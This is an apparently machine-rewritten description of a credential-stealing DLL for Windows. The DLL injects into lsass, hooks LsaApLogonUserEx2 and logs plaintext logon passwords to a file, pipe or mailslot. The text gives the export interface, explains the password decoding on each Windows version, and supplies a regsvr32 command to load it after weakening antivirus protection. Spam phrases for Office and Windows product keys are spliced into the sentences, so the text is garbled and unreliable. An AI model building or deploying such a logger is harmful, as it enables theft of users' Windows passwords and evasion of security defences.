windows authentication are eventually within the lsass process generally,
Microsoft Office Ultimate 2007, the default module is msv1_0.dll,
Genuine Office 2007, and the essential in its export perform LsaApLogonUserEx2,
this procedure by injecting code into the lsass process hook LsaApLogonUserEx2, intercept passwords . So long as the authentication process,
LsaApLogonUserEx2 triggers, which include the ipc $, runsa, 3389 Remote Desktop landing.
program to perform the processing around the distinct programs, in 2000,2003, xp, vista on both interception,
in 2000,2003,
Microsoft Office Home And Business 2010, xp, via UNICODE_STRING.Length high eight to bit xor important, when the password is encoded, then decoded by ntdll.RtlRunDecodeUnicodeString,
vista password via the AdvApi32.CredIsProtectedW determine whether the encoded decoding with AdvApi32.CredUnprotectW.
lsass can run your debugger to hang about
:)
======== Interface:
HRESULT WINAPI DllInstall (BOOL bInstall,
Windows 7 Product Key, LPCWSTR pszCmdLine );
This really is the prototype of the perform exported dll, make sure you don't be fooled through the title, this system is green.
this operate doesn't hold the set up of any motion through the begin, to not modify the registry or technique files. Just desired to opt for a consistent interface regsvr32 name it.
the very first parameter towards the program is ineffective,
2nd parameter, specify a file route (note the UNICODE),
Office Home And Business, the recorded information will probably be saved to right here (Ansi a).
file path may be similar to this C: x.log,
can be as . Pipe your_pipename, . Mailslot yourslot,
And that means you create your personal loader to name the dll, so that dll to intercept the password information via the pipe or mailslot sent for your plan. Data is really a string (that is Ansi's)
======== Test:
it is easy to create your own loader not rush to get in touch with, like a loader with regsvr32 to test this: (you might need to near a number of the energetic defense)
regsvr32 / n / i: c: xxx.log c: pluginWinPswLogger.dll
normal, then regsvr32 pop a prompt achievement.
this time it is easy to switch user or lock the personal computer and then log back again in, the method info to be intercepted password down and preserve it to c: xxx.log.
========= Finish